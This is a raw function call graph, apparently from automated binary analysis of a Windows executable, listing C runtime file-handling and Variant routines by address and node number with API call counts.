__write_nolock _memmove 87019->87023 87020 414d04 __fread_nolock 61 API calls 87020->87023 87021 40f691 __tzset_nolock 87021->86953 87023->87020 87023->87021 87025 425d11 87023->87025 87163 4150d1 87023->87163 87024 4150d1 _fseek 81 API calls 87026 425d33 87024->87026 87025->87024 87027 414d04 __fread_nolock 61 API calls 87026->87027 87027->87021 87029 414a52 __wfsopen 87028->87029 87030 414a64 87029->87030 87031 414a79 87029->87031 87303 417f77 46 API calls __getptd_noexit 87030->87303 87034 415471 __lock_file 47 API calls 87031->87034 87039 414a74 __wfsopen 87031->87039 87033 414a69 87304 417f25 10 API calls __wfsopen 87033->87304 87036 414a92 87034->87036 87287 4149d9 87036->87287 87039->86958 87372 414c76 87041->87372 87043 414d1c 87044 44afef 87043->87044 87540 442c5a 87044->87540 87046 44b00d 87046->86960 87048 414fee __wfsopen 87047->87048 87049 414ffa 87048->87049 87050 41500f 87048->87050 87544 417f77 46 API calls __getptd_noexit 87049->87544 87052 415471 __lock_file 47 API calls 87050->87052 87054 415017 87052->87054 87053 414fff 87545 417f25 10 API calls __wfsopen 87053->87545 87056 414e4e __ftell_nolock 51 API calls 87054->87056 87057 415024 87056->87057 87546 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87057->87546 87059 41500a __wfsopen 87059->86962 87061 414dd6 87060->87061 87062 414deb 87060->87062 87071 417f77 46 API calls __getptd_noexit 87061->87071 87062->87061 87064 414df2 87062->87064 87073 41b91b 79 API calls 11 library calls 87064->87073 87065 414ddb 87072 417f25 10 API calls __wfsopen 87065->87072 87068 414e18 87069 414de6 87068->87069 87074 418f98 77 API calls 7 library calls 87068->87074 87069->87014 87071->87065 87072->87069 87073->87068 87074->87069 87078 414910 __wfsopen 87075->87078 87076 414923 87131 417f77 46 API calls __getptd_noexit 87076->87131 87078->87076 87080 414951 87078->87080 87079 414928 87132 417f25 10 API calls __wfsopen 87079->87132 87094 41d4d1 87080->87094 87083 414956 87084 41496a 87083->87084 87085 41495d 87083->87085 87087 414992 87084->87087 87088 414972 87084->87088 87133 417f77 46 API calls __getptd_noexit 87085->87133 87111 41d218 87087->87111 87134 417f77 46 API calls __getptd_noexit 87088->87134 87089 414933 __wfsopen @_EH4_CallFilterFunc@8 87089->87018 87095 41d4dd __wfsopen 87094->87095 87096 4182cb __lock 46 API calls 87095->87096 87097 41d4eb 87096->87097 87098 41d567 87097->87098 87106 418209 __mtinitlocknum 46 API calls 87097->87106 87109 41d560 87097->87109 87139 4154b2 47 API calls __lock 87097->87139 87140 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87097->87140 87100 416b04 __malloc_crt 46 API calls 87098->87100 87101 41d56e 87100->87101 87103 41d57c InitializeCriticalSectionAndSpinCount 87101->87103 87101->87109 87102 41d5f0 __wfsopen 87102->87083 87104 41d59c 87103->87104 87105 41d5af EnterCriticalSection 87103->87105 87108 413748 _free 46 API calls 87104->87108 87105->87109 87106->87097 87108->87109 87136 41d5fb 87109->87136 87112 41d23a 87111->87112 87113 41d255 87112->87113 87125 41d26c __wopenfile 87112->87125 87145 417f77 46 API calls __getptd_noexit 87113->87145 87115 41d421 87118 41d47a 87115->87118 87119 41d48c 87115->87119 87116 41d25a 87146 417f25 10 API calls __wfsopen 87116->87146 87150 417f77 46 API calls __getptd_noexit 87118->87150 87142 422bf9 87119->87142 87122 41499d 87135 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87122->87135 87123 41d47f 87151 417f25 10 API calls __wfsopen 87123->87151 87125->87115 87125->87118 87125->87125 87147 41341f 58 API calls 2 library calls 87125->87147 87127 41d41a 87127->87115 87148 41341f 58 API calls 2 library calls 87127->87148 87129 41d439 87129->87115 87149 41341f 58 API calls 2 library calls 87129->87149 87131->87079 87132->87089 87133->87089 87134->87089 87135->87089 87141 4181f2 LeaveCriticalSection 87136->87141 87138 41d602 87138->87102 87139->87097 87140->87097 87141->87138 87152 422b35 87142->87152 87144 422c14 87144->87122 87145->87116 87146->87122 87147->87127 87148->87129 87149->87115 87150->87123 87151->87122 87155 422b41 __wfsopen 87152->87155 87153 422b54 87154 417f77 __wfsopen 46 API calls 87153->87154 87156 422b59 87154->87156 87155->87153 87157 422b8a 87155->87157 87158 417f25 __wfsopen 10 API calls 87156->87158 87159 422400 __tsopen_nolock 109 API calls 87157->87159 87162 422b63 __wfsopen 87158->87162 87160 422ba4 87159->87160 87161 422bcb __wsopen_helper LeaveCriticalSection 87160->87161 87161->87162 87162->87144 87165 4150dd __wfsopen 87163->87165 87164 4150e9 87194 417f77 46 API calls __getptd_noexit 87164->87194 87165->87164 87166 41510f 87165->87166 87176 415471 87166->87176 87169 4150ee 87195 417f25 10 API calls __wfsopen 87169->87195 87175 4150f9 __wfsopen 87175->87023 87177 415483 87176->87177 87178 4154a5 EnterCriticalSection 87176->87178 87177->87178 87180 41548b 87177->87180 87179 415117 87178->87179 87182 415047 87179->87182 87181 4182cb __lock 46 API calls 87180->87181 87181->87179 87183 415067 87182->87183 87184 415057 87182->87184 87189 415079 87183->87189 87197 414e4e 87183->87197 87252 417f77 46 API calls __getptd_noexit 87184->87252 87188 41505c 87196 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87188->87196 87214 41443c 87189->87214 87192 4150b9 87227 41e1f4 87192->87227 87194->87169 87195->87175 87196->87175 87198 414e61 87197->87198 87199 414e79 87197->87199 87253 417f77 46 API calls __getptd_noexit 87198->87253 87200 414139 __filbuf 46 API calls 87199->87200 87202 414e80 87200->87202 87205 41e1f4 __write 51 API calls 87202->87205 87203 414e66 87254 417f25 10 API calls __wfsopen 87203->87254 87206 414e97 87205->87206 87207 414f09 87206->87207 87209 414ec9 87206->87209 87213 414e71 87206->87213 87255 417f77 46 API calls __getptd_noexit 87207->87255 87210 41e1f4 __write 51 API calls 87209->87210 87209->87213 87211 414f64 87210->87211 87212 41e1f4 __write 51 API calls 87211->87212 87211->87213 87212->87213 87213->87189 87215 414455 87214->87215 87216 414477 87214->87216 87215->87216 87217 414139 __filbuf 46 API calls 87215->87217 87220 414139 87216->87220 87218 414470 87217->87218 87256 41b7b2 77 API calls 5 library calls 87218->87256 87221 414145 87220->87221 87222 41415a 87220->87222 87257 417f77 46 API calls __getptd_noexit 87221->87257 87222->87192 87224 41414a 87258 417f25 10 API calls __wfsopen 87224->87258 87226 414155 87226->87192 87228 41e200 __wfsopen 87227->87228 87229 41e223 87228->87229 87230 41e208 87228->87230 87232 41e22f 87229->87232 87235 41e269 87229->87235 87279 417f8a 46 API calls __getptd_noexit 87230->87279 87281 417f8a 46 API calls __getptd_noexit 87232->87281 87233 41e20d 87280 417f77 46 API calls __getptd_noexit 87233->87280 87259 41ae56 87235->87259 87237 41e234 87282 417f77 46 API calls __getptd_noexit 87237->87282 87240 41e26f 87242 41e291 87240->87242 87243 41e27d 87240->87243 87241 41e23c 87283 417f25 10 API calls __wfsopen 87241->87283 87284 417f77 46 API calls __getptd_noexit 87242->87284 87269 41e17f 87243->87269 87245 41e215 __wfsopen 87245->87188 87248 41e289 87286 41e2c0 LeaveCriticalSection __unlock_fhandle 87248->87286 87249 41e296 87285 417f8a 46 API calls __getptd_noexit 87249->87285 87252->87188 87253->87203 87254->87213 87255->87213 87256->87216 87257->87224 87258->87226 87260 41ae62 __wfsopen 87259->87260 87261 41aebc 87260->87261 87262 4182cb __lock 46 API calls 87260->87262 87263 41aec1 EnterCriticalSection 87261->87263 87264 41aede __wfsopen 87261->87264 87265 41ae8e 87262->87265 87263->87264 87264->87240 87266 41aeaa 87265->87266 87267 41ae97 InitializeCriticalSectionAndSpinCount 87265->87267 87268 41aeec ___lock_fhandle LeaveCriticalSection 87266->87268 87267->87266 87268->87261 87270 41aded __chsize_nolock 46 API calls 87269->87270 87271 41e18e 87270->87271 87272 41e1a4 SetFilePointer 87271->87272 87273 41e194 87271->87273 87275 41e1bb GetLastError 87272->87275 87276 41e1c3 87272->87276 87274 417f77 __wfsopen 46 API calls 87273->87274 87277 41e199 87274->87277 87275->87276 87276->87277 87278 417f9d __dosmaperr 46 API calls 87276->87278 87277->87248 87278->87277 87279->87233 87280->87245 87281->87237 87282->87241 87283->87245 87284->87249 87285->87248 87286->87245 87288 4149ea 87287->87288 87289 4149fe 87287->87289 87333 417f77 46 API calls __getptd_noexit 87288->87333 87291 4149fa 87289->87291 87293 41443c __flush 77 API calls 87289->87293 87305 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87291->87305 87292 4149ef 87334 417f25 10 API calls __wfsopen 87292->87334 87295 414a0a 87293->87295 87306 41d8c2 87295->87306 87298 414139 __filbuf 46 API calls 87299 414a18 87298->87299 87310 41d7fe 87299->87310 87301 414a1e 87301->87291 87302 413748 _free 46 API calls 87301->87302 87302->87291 87303->87033 87304->87039 87305->87039 87307 414a12 87306->87307 87308 41d8d2 87306->87308 87307->87298 87308->87307 87309 413748 _free 46 API calls 87308->87309 87309->87307 87311 41d80a __wfsopen 87310->87311 87312 41d812 87311->87312 87313 41d82d 87311->87313 87350 417f8a 46 API calls __getptd_noexit 87312->87350 87315 41d839 87313->87315 87318 41d873 87313->87318 87352 417f8a 46 API calls __getptd_noexit 87315->87352 87316 41d817 87351 417f77 46 API calls __getptd_noexit 87316->87351 87321 41ae56 ___lock_fhandle 48 API calls 87318->87321 87320 41d83e 87353 417f77 46 API calls __getptd_noexit 87320->87353 87323 41d879 87321->87323 87325 41d893 87323->87325 87326 41d887 87323->87326 87324 41d846 87354 417f25 10 API calls __wfsopen 87324->87354 87355 417f77 46 API calls __getptd_noexit 87325->87355 87335 41d762 87326->87335 87330 41d81f __wfsopen 87330->87301 87331 41d88d 87356 41d8ba LeaveCriticalSection __unlock_fhandle 87331->87356 87333->87292 87334->87291 87357 41aded 87335->87357 87337 41d772 87338 41d7c8 87337->87338 87340 41d7a6 87337->87340 87342 41aded __chsize_nolock 46 API calls 87337->87342 87370 41ad67 47 API calls 2 library calls 87338->87370 87340->87338 87343 41aded __chsize_nolock 46 API calls 87340->87343 87341 41d7d0 87345 41d7f2 87341->87345 87371 417f9d 46 API calls 3 library calls 87341->87371 87346 41d79d 87342->87346 87344 41d7b2 CloseHandle 87343->87344 87344->87338 87347 41d7be GetLastError 87344->87347 87345->87331 87349 41aded __chsize_nolock 46 API calls 87346->87349 87347->87338 87349->87340 87350->87316 87351->87330 87352->87320 87353->87324 87354->87330 87355->87331 87356->87330 87358 41ae12 87357->87358 87359 41adfa 87357->87359 87361 417f8a __chsize_nolock 46 API calls 87358->87361 87364 41ae51 87358->87364 87360 417f8a __chsize_nolock 46 API calls 87359->87360 87362 41adff 87360->87362 87363 41ae23 87361->87363 87365 417f77 __wfsopen 46 API calls 87362->87365 87366 417f77 __wfsopen 46 API calls 87363->87366 87364->87337 87367 41ae07 87365->87367 87368 41ae2b 87366->87368 87367->87337 87369 417f25 __wfsopen 10 API calls 87368->87369 87369->87367 87370->87341 87371->87345 87373 414c82 __wfsopen 87372->87373 87374 414cc3 87373->87374 87375 414cbb __wfsopen 87373->87375 87377 414c96 setSBCS 87373->87377 87376 415471 __lock_file 47 API calls 87374->87376 87375->87043 87378 414ccb 87376->87378 87399 417f77 46 API calls __getptd_noexit 87377->87399 87385 414aba 87378->87385 87381 414cb0 87400 417f25 10 API calls __wfsopen 87381->87400 87386 414af2 87385->87386 87390 414ad8 setSBCS 87385->87390 87401 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87386->87401 87387 414ae2 87452 417f77 46 API calls __getptd_noexit 87387->87452 87389 414b2d 87389->87386 87393 414c38 setSBCS 87389->87393 87395 414139 __filbuf 46 API calls 87389->87395 87402 41dfcc 87389->87402 87432 41d8f3 87389->87432 87454 41e0c2 46 API calls 3 library calls 87389->87454 87390->87386 87390->87387 87390->87389 87455 417f77 46 API calls __getptd_noexit 87393->87455 87395->87389 87398 414ae7 87453 417f25 10 API calls __wfsopen 87398->87453 87399->87381 87400->87375 87401->87375 87403 41dfd8 __wfsopen 87402->87403 87404 41dfe0 87403->87404 87405 41dffb 87403->87405 87525 417f8a 46 API calls __getptd_noexit 87404->87525 87407 41e007 87405->87407 87411 41e041 87405->87411 87527 417f8a 46 API calls __getptd_noexit 87407->87527 87409 41dfe5 87526 417f77 46 API calls __getptd_noexit 87409->87526 87410 41e00c 87528 417f77 46 API calls __getptd_noexit 87410->87528 87414 41e063 87411->87414 87415 41e04e 87411->87415 87419 41ae56 ___lock_fhandle 48 API calls 87414->87419 87530 417f8a 46 API calls __getptd_noexit 87415->87530 87416 41dfed __wfsopen 87416->87389 87417 41e014 87529 417f25 10 API calls __wfsopen 87417->87529 87420 41e069 87419->87420 87422 41e077 87420->87422 87423 41e08b 87420->87423 87421 41e053 87531 417f77 46 API calls __getptd_noexit 87421->87531 87456 41da15 87422->87456 87532 417f77 46 API calls __getptd_noexit 87423->87532 87428 41e083 87534 41e0ba LeaveCriticalSection __unlock_fhandle 87428->87534 87429 41e090 87533 417f8a 46 API calls __getptd_noexit 87429->87533 87433 41d900 87432->87433 87437 41d915 87432->87437 87538 417f77 46 API calls __getptd_noexit 87433->87538 87435 41d905 87539 417f25 10 API calls __wfsopen 87435->87539 87438 41d94a 87437->87438 87443 41d910 87437->87443 87535 420603 87437->87535 87440 414139 __filbuf 46 API calls 87438->87440 87441 41d95e 87440->87441 87442 41dfcc __read 59 API calls 87441->87442 87444 41d965 87442->87444 87443->87389 87444->87443 87445 414139 __filbuf 46 API calls 87444->87445 87446 41d988 87445->87446 87446->87443 87447 414139 __filbuf 46 API calls 87446->87447 87448 41d994 87447->87448 87448->87443 87449 414139 __filbuf 46 API calls 87448->87449 87450 41d9a1 87449->87450 87451 414139 __filbuf 46 API calls 87450->87451 87451->87443 87452->87398 87453->87386 87454->87389 87455->87398 87457 41da31 87456->87457 87458 41da4c 87456->87458 87459 417f8a __chsize_nolock 46 API calls 87457->87459 87460 41da5b 87458->87460 87462 41da7a 87458->87462 87461 41da36 87459->87461 87463 417f8a __chsize_nolock 46 API calls 87460->87463 87465 417f77 __wfsopen 46 API calls 87461->87465 87464 41da98 87462->87464 87479 41daac 87462->87479 87466 41da60 87463->87466 87467 417f8a __chsize_nolock 46 API calls 87464->87467 87476 41da3e 87465->87476 87469 417f77 __wfsopen 46 API calls 87466->87469 87471 41da9d 87467->87471 87468 41db02 87470 417f8a __chsize_nolock 46 API calls 87468->87470 87472 41da67 87469->87472 87473 41db07 87470->87473 87474 417f77 __wfsopen 46 API calls 87471->87474 87475 417f25 __wfsopen 10 API calls 87472->87475 87477 417f77 __wfsopen 46 API calls 87473->87477 87478 41daa4 87474->87478 87475->87476 87476->87428 87477->87478 87482 417f25 __wfsopen 10 API calls 87478->87482 87479->87468 87479->87476 87480 41dae1 87479->87480 87481 41db1b 87479->87481 87480->87468 87487 41daec ReadFile 87480->87487 87484 416b04 __malloc_crt 46 API calls 87481->87484 87482->87476 87488 41db31 87484->87488 87485 41dc17 87486 41df8f GetLastError 87485->87486 87493 41dc2b 87485->87493 87489 41de16 87486->87489 87490 41df9c 87486->87490 87487->87485 87487->87486 87491 41db59 87488->87491 87492 41db3b 87488->87492 87497 417f9d __dosmaperr 46 API calls 87489->87497 87504 41dd9b 87489->87504 87495 417f77 __wfsopen 46 API calls 87490->87495 87494 420494 __lseeki64_nolock 48 API calls 87491->87494 87496 417f77 __wfsopen 46 API calls 87492->87496 87493->87504 87506 41de5b 87493->87506 87507 41dc47 87493->87507 87499 41db67 87494->87499 87500 41dfa1 87495->87500 87498 41db40 87496->87498 87497->87504 87501 417f8a __chsize_nolock 46 API calls 87498->87501 87499->87487 87502 417f8a __chsize_nolock 46 API calls 87500->87502 87501->87476 87502->87504 87503 413748 _free 46 API calls 87503->87476 87504->87476 87504->87503 87505 41ded0 ReadFile 87510 41deef GetLastError 87505->87510 87518 41def9 87505->87518 87506->87504 87506->87505 87508 41dcab ReadFile 87507->87508 87513 41dd28 87507->87513 87509 41dcc9 GetLastError 87508->87509 87517 41dcd3 87508->87517 87509->87507 87509->87517 87510->87506 87510->87518 87511 41ddec MultiByteToWideChar 87511->87504 87512 41de10 GetLastError 87511->87512 87512->87489 87513->87504 87514 41dda3 87513->87514 87515 41dd96 87513->87515 87520 41dd60 87513->87520 87514->87520 87521 41ddda 87514->87521 87516 417f77 __wfsopen 46 API calls 87515->87516 87516->87504 87517->87507 87522 420494 __lseeki64_nolock 48 API calls 87517->87522 87518->87506 87519 420494 __lseeki64_nolock 48 API calls 87518->87519 87519->87518 87520->87511 87523 420494 __lseeki64_nolock 48 API calls 87521->87523 87522->87517 87524 41dde9 87523->87524 87524->87511 87525->87409 87526->87416 87527->87410 87528->87417 87529->87416 87530->87421 87531->87417 87532->87429 87533->87428 87534->87416 87536 416b04 __malloc_crt 46 API calls 87535->87536 87537 420618 87536->87537 87537->87438 87538->87435 87539->87443 87543 4148b3 GetSystemTimeAsFileTime __aulldiv 87540->87543 87542 442c6b 87542->87046 87543->87542 87544->87053 87545->87059 87546->87059 87550 45272f __tzset_nolock _wcscpy 87547->87550 87548 44afef GetSystemTimeAsFileTime 87548->87550 87549 4528a4 87549->86968 87549->86969 87550->87548 87550->87549 87551 414d04 61 API calls __fread_nolock 87550->87551 87552 4150d1 81 API calls _fseek 87550->87552 87551->87550 87552->87550 87554 44b1bc 87553->87554 87555 44b1ca 87553->87555 87556 4149c2 116 API calls 87554->87556 87557 44b1e1 87555->87557 87558 4149c2 116 API calls 87555->87558 87559 44b1d8 87555->87559 87556->87555 87588 4321a4 87557->87588 87560 44b2db 87558->87560 87559->86997 87560->87557 87562 44b2e9 87560->87562 87566 414a46 __fcloseall 82 API calls 87562->87566 87570 44b2f6 87562->87570 87563 44b224 87564 44b253 87563->87564 87565 44b228 87563->87565 87592 43213d 87564->87592 87568 44b235 87565->87568 87572 414a46 __fcloseall 82 API calls 87565->87572 87566->87570 87569 44b245 87568->87569 87573 414a46 __fcloseall 82 API calls 87568->87573 87569->86997 87570->86997 87571 44b25a 87574 44b260 87571->87574 87575 44b289 87571->87575 87572->87568 87573->87569 87577 44b26d 87574->87577 87579 414a46 __fcloseall 82 API calls 87574->87579 87602 44b0bf 87 API calls 87575->87602 87580 44b27d 87577->87580 87582 414a46 __fcloseall 82 API calls 87577->87582 87578 44b28f 87603 4320f8 46 API calls _free 87578->87603 87579->87577 87580->86997 87582->87580 87583 44b295 87584 44b2a2 87583->87584 87585 414a46 __fcloseall 82 API calls 87583->87585 87586 44b2b2 87584->87586 87587 414a46 __fcloseall 82 API calls 87584->87587 87585->87584 87586->86997 87587->87586 87589 4321cb 87588->87589 87591 4321b4 __tzset_nolock _memmove 87588->87591 87590 414d04 __fread_nolock 61 API calls 87589->87590 87590->87591 87591->87563 87593 4135bb _malloc 46 API calls 87592->87593 87594 432150 87593->87594 87595 4135bb _malloc 46 API calls 87594->87595 87596 432162 87595->87596 87597 4135bb _malloc 46 API calls 87596->87597 87598 432174 87597->87598 87600 432189 87598->87600 87604 4320f8 46 API calls _free 87598->87604 87600->87571 87601 432198 87601->87571 87602->87578 87603->87583 87604->87601 87605->86898 87606->86900 87607->86919 87608->86919 87609->86919 87610->86910 87611->86919 87612->86919 87613->86923 87614->86932 87615->86933 87616->86933 87666 410160 87617->87666 87619 41012f GetFullPathNameW 87620 410147 moneypunct 87619->87620 87620->86753 87622 4102cb SHGetDesktopFolder 87621->87622 87623 410333 _wcsncpy 87621->87623 87622->87623 87624 4102e0 _wcsncpy 87622->87624 87623->86756 87624->87623 87625 41031c SHGetPathFromIDListW 87624->87625 87625->87623 87627 4101bb 87626->87627 87631 425f4a 87626->87631 87628 410160 52 API calls 87627->87628 87630 4101c7 87628->87630 87629 4114ab __wcsicoll 58 API calls 87629->87631 87670 410200 52 API calls 2 library calls 87630->87670 87631->87629 87633 425f6e 87631->87633 87633->86758 87634 4101d6 87671 410200 52 API calls 2 library calls 87634->87671 87636 4101e9 87636->86758 87638 40f760 128 API calls 87637->87638 87639 40f584 87638->87639 87640 429335 87639->87640 87641 40f58c 87639->87641 87644 4528bd 118 API calls 87640->87644 87642 40f598 87641->87642 87643 429358 87641->87643 87696 4033c0 113 API calls 7 library calls 87642->87696 87697 434034 86 API calls _wprintf 87643->87697 87647 42934b 87644->87647 87648 429373 87647->87648 87649 42934f 87647->87649 87653 4115d7 52 API calls 87648->87653 87652 431e58 82 API calls 87649->87652 87650 429369 87650->87648 87651 40f5b4 87651->86755 87652->87643 87665 4293c5 moneypunct 87653->87665 87654 42959c 87655 413748 _free 46 API calls 87654->87655 87656 4295a5 87655->87656 87657 431e58 82 API calls 87656->87657 87658 4295b1 87657->87658 87662 401b10 52 API calls 87662->87665 87665->87654 87665->87662 87672 444af8 87665->87672 87675 44b41c 87665->87675 87682 402780 87665->87682 87690 4022d0 87665->87690 87698 44c7dd 64 API calls 3 library calls 87665->87698 87667 410167 _wcslen 87666->87667 87668 4115d7 52 API calls 87667->87668 87669 41017e _wcscpy 87668->87669 87669->87619 87670->87634 87671->87636 87673 4115d7 52 API calls 87672->87673 87674 444b27 _memmove 87673->87674 87674->87665 87676 44b429 87675->87676 87677 4115d7 52 API calls 87676->87677 87678 44b440 87677->87678 87679 44b45e 87678->87679 87680 401b10 52 API calls 87678->87680 87679->87665 87681 44b453 87680->87681 87681->87665 87683 402827 87682->87683 87686 402790 moneypunct _memmove 87682->87686 87685 4115d7 52 API calls 87683->87685 87684 4115d7 52 API calls 87687 402797 87684->87687 87685->87686 87686->87684 87688 4027bd 87687->87688 87689 4115d7 52 API calls 87687->87689 87688->87665 87689->87688 87691 4022e0 87690->87691 87693 40239d 87690->87693 87692 4115d7 52 API calls 87691->87692 87691->87693 87694 402320 moneypunct 87691->87694 87692->87694 87693->87665 87694->87693 87695 4115d7 52 API calls 87694->87695 87695->87694 87696->87651 87697->87650 87698->87665 87700 402539 moneypunct 87699->87700 87701 402417 87699->87701 87700->86762 87701->87700 87702 4115d7 52 API calls 87701->87702 87703 402443 87702->87703 87704 4115d7 52 API calls 87703->87704 87705 4024b4 87704->87705 87705->87700 87707 4022d0 52 API calls 87705->87707 87728 402880 95 API calls 2 library calls 87705->87728 87707->87705 87713 401566 87708->87713 87709 401794 87729 40e9a0 90 API calls 87709->87729 87712 4010a0 52 API calls 87712->87713 87713->87709 87713->87712 87714 40167a 87713->87714 87715 4017c0 87714->87715 87730 45e737 90 API calls 3 library calls 87714->87730 87715->86765 87717 40bc70 52 API calls 87716->87717 87718 40d451 87717->87718 87719 40d50f 87718->87719 87721 40d519 87718->87721 87722 40e0a0 52 API calls 87718->87722 87724 401b10 52 API calls 87718->87724 87726 427c01 87718->87726 87731 40f310 53 API calls 87718->87731 87732 40d860 91 API calls 87718->87732 87733 410600 52 API calls 87719->87733 87721->86767 87722->87718 87724->87718 87734 45e737 90 API calls 3 library calls 87726->87734 87728->87705 87729->87714 87730->87715 87731->87718 87732->87718 87733->87721 87734->87721 87735->86780 87736->86781 87738 42c5fe 87737->87738 87753 4091c6 87737->87753 87739 40bc70 52 API calls 87738->87739 87738->87753 87740 42c64e InterlockedIncrement 87739->87740 87741 42c665 87740->87741 87746 42c697 87740->87746 87743 42c672 InterlockedDecrement Sleep InterlockedIncrement 87741->87743 87741->87746 87742 42c737 InterlockedDecrement 87744 42c74a 87742->87744 87743->87741 87743->87746 87747 408f40 VariantClear 87744->87747 87745 42c731 87745->87742 87746->87742 87746->87745 87895 408e80 VariantClear 87746->87895 87749 42c752 87747->87749 87901 410c60 VariantClear moneypunct 87749->87901 87750 42c6cf 87896 45340c 85 API calls 87750->87896 87753->86841 87754 42c6db 87755 402160 52 API calls 87754->87755 87756 42c6e5 87755->87756 87897 45340c 85 API calls 87756->87897 87758 42c6f1 87898 40d200 52 API calls 2 library calls 87758->87898 87760 42c6fb 87899 465124 53 API calls 87760->87899 87762 42c715 87763 42c76a 87762->87763 87764 42c719 87762->87764 87766 401b10 52 API calls 87763->87766 87900 46fe32 VariantClear 87764->87900 87767 42c77e 87766->87767 87768 401980 53 API calls 87767->87768 87773 42c796 87768->87773 87769 42c812 87903 46fe32 VariantClear 87769->87903 87771 42c82a InterlockedDecrement 87904 46ff07 54 API calls 87771->87904 87773->87769 87774 42c864 87773->87774 87902 40ba10 52 API calls 2 library calls 87773->87902 87905 45e737 90 API calls 3 library calls 87774->87905 87776 42c9ec 87948 47d33e 331 API calls 87776->87948 87779 42c9fe 87949 46feb1 VariantClear VariantClear 87779->87949 87780 401980 53 API calls 87789 42c849 87780->87789 87782 42c874 87785 408f40 VariantClear 87782->87785 87794 42ca59 87782->87794 87783 408f40 VariantClear 87783->87789 87784 42ca08 87787 401b10 52 API calls 87784->87787 87788 42c891 87785->87788 87786 402780 52 API calls 87786->87789 87790 42ca15 87787->87790 87906 410c60 VariantClear moneypunct 87788->87906 87789->87776 87789->87780 87789->87783 87789->87786 87907 40a780 87789->87907 87791 40c2c0 52 API calls 87790->87791 87791->87782 87794->87794 87796 40afc4 87795->87796 87797 40b156 87795->87797 87798 40afd5 87796->87798 87799 42d1e3 87796->87799 87959 45e737 90 API calls 3 library calls 87797->87959 87804 40a780 194 API calls 87798->87804 87820 40b11a moneypunct 87798->87820 87960 45e737 90 API calls 3 library calls 87799->87960 87802 42d1f8 87808 408f40 VariantClear 87802->87808 87803 40b143 87803->86841 87806 40b00a 87804->87806 87806->87802 87809 40b012 87806->87809 87807 42d4db 87807->87807 87808->87803 87810 40b04a 87809->87810 87811 42d231 VariantClear 87809->87811 87813 40b094 moneypunct 87809->87813 87814 40b05c moneypunct 87810->87814 87961 40e270 VariantClear moneypunct 87810->87961 87811->87814 87812 40b108 87812->87820 87962 40e270 VariantClear moneypunct 87812->87962 87813->87812 87817 42d425 moneypunct 87813->87817 87814->87813 87818 4115d7 52 API calls 87814->87818 87815 42d45a VariantClear 87815->87820 87817->87815 87817->87820 87818->87813 87820->87803 87963 45e737 90 API calls 3 library calls 87820->87963 87822 40900d 87821->87822 87823 408fff 87821->87823 87826 42c3f6 87822->87826 87828 4090f2 moneypunct 87822->87828 87829 42c44a 87822->87829 87830 40a780 194 API calls 87822->87830 87831 42c47b 87822->87831 87834 42c564 87822->87834 87836 42c4cb 87822->87836 87839 42c548 87822->87839 87841 409112 87822->87841 87844 4090df 87822->87844 87846 42c528 87822->87846 87848 4090ea 87822->87848 87967 4534e3 52 API calls 87822->87967 87969 40c4e0 194 API calls 87822->87969 87964 403ea0 52 API calls __cinit 87823->87964 87968 45e737 90 API calls 3 library calls 87826->87968 87828->86841 87970 45e737 90 API calls 3 library calls 87829->87970 87830->87822 87971 451b42 61 API calls 87831->87971 87837 408f40 VariantClear 87834->87837 87973 47faae 233 API calls 87836->87973 87837->87828 87976 45e737 90 API calls 3 library calls 87839->87976 87840 42c4da 87840->87828 87974 45e737 90 API calls 3 library calls 87840->87974 87841->87839 87851 40912b 87841->87851 87842 42c491 87842->87828 87972 45e737 90 API calls 3 library calls 87842->87972 87844->87848 87965 408e80 VariantClear 87844->87965 87975 45e737 90 API calls 3 library calls 87846->87975 87852 408f40 VariantClear 87848->87852 87851->87828 87966 403e10 53 API calls 87851->87966 87852->87828 87854 40914b 87855 408f40 VariantClear 87854->87855 87855->87828 87977 408d90 87856->87977 87858 429778 88004 410c60 VariantClear moneypunct 87858->88004 87860 408cf9 87860->87858 87862 42976c 87860->87862 87864 408d2d 87860->87864 87861 429780 88003 45e737 90 API calls 3 library calls 87862->88003 87993 403d10 87864->87993 87867 408d71 moneypunct 87867->86841 87868 408f40 VariantClear 87869 408d45 moneypunct 87868->87869 87869->87867 87869->87868 87870->86841 87871->86841 87872->86841 87873->86841 87874->86791 87875->86797 87876->86841 87877->86841 87878->86841 87879->86841 87880->86847 87881->86847 87882->86847 87883->86847 87884->86847 87885->86847 87886->86847 87888 403cdf 87887->87888 87889 408f40 VariantClear 87888->87889 87890 403ce7 87889->87890 87890->86835 87891->86847 87892->86847 87893->86841 87894->86788 87895->87750 87896->87754 87897->87758 87898->87760 87899->87762 87900->87745 87901->87753 87902->87773 87903->87771 87904->87789 87905->87782 87906->87753 87908 40a7a6 87907->87908 87909 40ae8c 87907->87909 87911 4115d7 52 API calls 87908->87911 87950 41130a 51 API calls __cinit 87909->87950 87945 40a7c6 moneypunct _memmove 87911->87945 87912 40a86d 87913 40abd1 87912->87913 87929 40a878 moneypunct 87912->87929 87955 45e737 90 API calls 3 library calls 87913->87955 87914 401b10 52 API calls 87914->87945 87916 40b5f0 89 API calls 87916->87945 87917 408e80 VariantClear 87917->87945 87918 42b791 VariantClear 87918->87945 87919 42ba2d VariantClear 87919->87945 87920 408f40 VariantClear 87920->87929 87921 40a884 moneypunct 87921->87789 87922 42b459 VariantClear 87922->87945 87923 40e270 VariantClear 87923->87945 87924 42b6f6 VariantClear 87924->87945 87926 40bc10 53 API calls 87926->87945 87927 408cc0 187 API calls 87927->87945 87928 42bc5b 87928->87789 87929->87920 87929->87921 87930 4115d7 52 API calls 87930->87945 87931 42bbf5 87956 45e737 90 API calls 3 library calls 87931->87956 87932 42bb6a 87958 44b92d VariantClear 87932->87958 87933 4115d7 52 API calls 87936 42b5b3 VariantInit VariantCopy 87933->87936 87935 408f40 VariantClear 87935->87945 87939 42b5d7 VariantClear 87936->87939 87936->87945 87939->87945 87941 42bc37 87957 45e737 90 API calls 3 library calls 87941->87957 87944 42bc48 87944->87932 87946 408f40 VariantClear 87944->87946 87945->87912 87945->87913 87945->87914 87945->87916 87945->87917 87945->87918 87945->87919 87945->87922 87945->87923 87945->87924 87945->87926 87945->87927 87945->87930 87945->87931 87945->87932 87945->87933 87945->87935 87945->87941 87947 4530c9 VariantClear 87945->87947 87951 45308a 53 API calls 87945->87951 87952 470870 52 API calls 87945->87952 87953 457f66 87 API calls __write_nolock 87945->87953 